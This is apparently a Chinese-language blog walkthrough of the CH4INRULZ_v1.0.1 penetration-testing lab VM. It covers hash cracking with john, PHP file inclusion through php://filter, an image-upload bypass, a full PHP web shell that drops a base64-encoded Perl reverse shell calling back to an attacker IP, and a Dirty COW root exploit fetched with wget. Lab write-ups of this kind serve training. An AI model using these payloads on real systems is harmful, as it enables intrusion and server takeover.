0
点赞
收藏
分享

微信扫一扫

CH4INRULZ_v1.0.1内网渗透靶场

单调先生 2022-03-17 阅读 40
phpdebianp2p

nmap -T4 -A -p- 192.168.206.146

这里我们借助工具dirsearch对该网站进行目录扫描

http://192.168.206.146/development/

然后再通过御剑进行扫描

http://192.168.206.146/index.html.bak

frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

通过工具john进行一下解密 把解密结果存储到相应文件中

cd /root
touch password.txt
nano password.txt
  # frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
john password.txt > res.log

john --show password.txt > res.log

爆破成功 成功获得账户

frank

frank!!!

成功获得账户以后 接下来我们需要登录进入后台

http://192.168.206.146/development/

之后想起来之前还有一个8011的端口开放的http的服务 我们继续访问一下该服务

http://192.168.206.146:8011

接下来尝试继续使用御剑进行网站的扫描:

http://192.168.206.146:8011/api/

经过测试    只有files_api.php可以被成功访问

http://192.168.206.146:8011/api/files_api.php

接下来猜测  这个界面可以进行文件包含 同时参数名就是file  我们可以分别尝试get型和post型两种方式对其进行文件包含

接下来我们可以尝试使用伪协议查看一个这个界面对于参数的过滤规则  也就是查看其源代码

http://192.168.206.146:8011/api/files_api.php?file=php://filter/read=convert.base64-encode/resource=files_api.php

至此逻辑思路分析清晰 接下来我们需要进行文件上传 将格式修改为jpg格式 然后修MIME为image/jpeg  之后

<head>
  <title>franks website | simple website browser API</title>
</head>

<?php
$file = $_POST['file'];
include($file);
$get_file = $_GET['file'];

if(isset($get_file)){

echo "<b>********* HACKER DETECTED *********</b>";
echo "<p>YOUR IP IS : ".$_SERVER['REMOTE_ADDR'];
echo "</p><p>WRONG INPUT !!</p>";
break;
}

if(!isset($file)){
echo "<p>No parameter called file passed to me</p>";
echo "<p>* Note : this API don't use json , so send the file name in raw format</p>";
}
/** else{
echo strcmp($file,"/etc/passwd");
echo strlen($file);
echo strlen("/etc/passwd");
if($file == "/etc/passwd"){
        "HACKER DETECTED ..";
        }
}**/

?>
添加GIF89a 即可成功绕过

根据提示  

http://192.168.206.146/development/uploader

文件上传成功以后我们注意到url变了

接下来我们也可以通过文件包含查看相应上传的过滤情况

http://192.168.206.146:8011/api/files_api.php

file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php

<?php

$target_dir = "FRANKuploads/";

$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

$uploadOk = 1;

$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));

// Check if image file is a actual image or fake image

if(isset($_POST["submit"])) {

    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);

    if($check !== false) {

        echo "File is an image - " . $check["mime"] . ".";

        $uploadOk = 1;

    } else {

        echo "File is not an image.";

        $uploadOk = 0;

    }

}

// Check if file already exists

if (file_exists($target_file)) {

    echo "Sorry, file already exists.";

    $uploadOk = 0;

}

// Check file size

if ($_FILES["fileToUpload"]["size"] > 500000) {

    echo "Sorry, your file is too large.";

    $uploadOk = 0;

}

// Allow certain file formats

if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"

&& $imageFileType != "gif" ) {

    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";

    $uploadOk = 0;

}

// Check if $uploadOk is set to 0 by an error

if ($uploadOk == 0) {

    echo "Sorry, your file was not uploaded.";

// if everything is ok, try to upload file

} else {

    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {

        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";

    } else {

        echo "Sorry, there was an error uploading your file.";

    }

}

?>

至此也已经成功找到了相应的上传文件所在的位置

http://192.168.206.146/development/uploader/FRANKuploads/sqzr.jpg

接下来我们可以通过文件包含来执行这个jpg

http://192.168.206.146:8011/api/files_api.php

file=/var/www/development/uploader/FRANKuploads/sqzr.jpg

接下来可以通过工具进行链接!!

介于出现了木马不合适的问题  这里我们使用另一个木马

<?php

function which($pr) {

$path = execute("which $pr");

return ($path ? $path : $pr);

}

function execute($cfe) {

$res = '';

if ($cfe) {

if(function_exists('exec')) {

@exec($cfe,$res);

$res = join("\n",$res);

} elseif(function_exists('shell_exec')) {

$res = @shell_exec($cfe);

} elseif(function_exists('system')) {

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(@is_resource($f = @popen($cfe,"r"))) {

$res = '';

while(!@feof($f)) {

$res .= @fread($f,1024);

}

@pclose($f);

}

}

return $res;

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')) {

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

}

$yourip = "192.168.206.128";                    # 修改为你的攻击机的ip

$yourport = '8899';                        # 修改为攻击机的监听端口

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

这里我们重新进行文件上传  图片名字叫做muma.jpg

接下来我们在相应的攻击机器中使用nc进行监听

nc -lvp 8899

然后我们直接包含然后访问这个文件

http://192.168.206.146:8011/api/files_api.php

file=/var/www/development/uploader/FRANKuploads/muma.jpg

接下来在新的kali界面中    这里使用的是其中之一的脏牛提权的exp  还有很多可以直接提权的exp这里不多赘述了

searchsploit Dirty

cp /usr/share/exploitdb/exploits/linux/local/40839.c /root/crack.c

python -m SimpleHTTPServer

目标靶机

cd /tmp

wget http://192.168.206.128:8000/crack.c

gcc -pthread crack.c -o crack -lcrypt

./crack 123

123是随便输入的一个密码

之后就成功创建了一个密码是123的用户firefart

此时断开nc重新链接一下

举报

相关推荐

0 条评论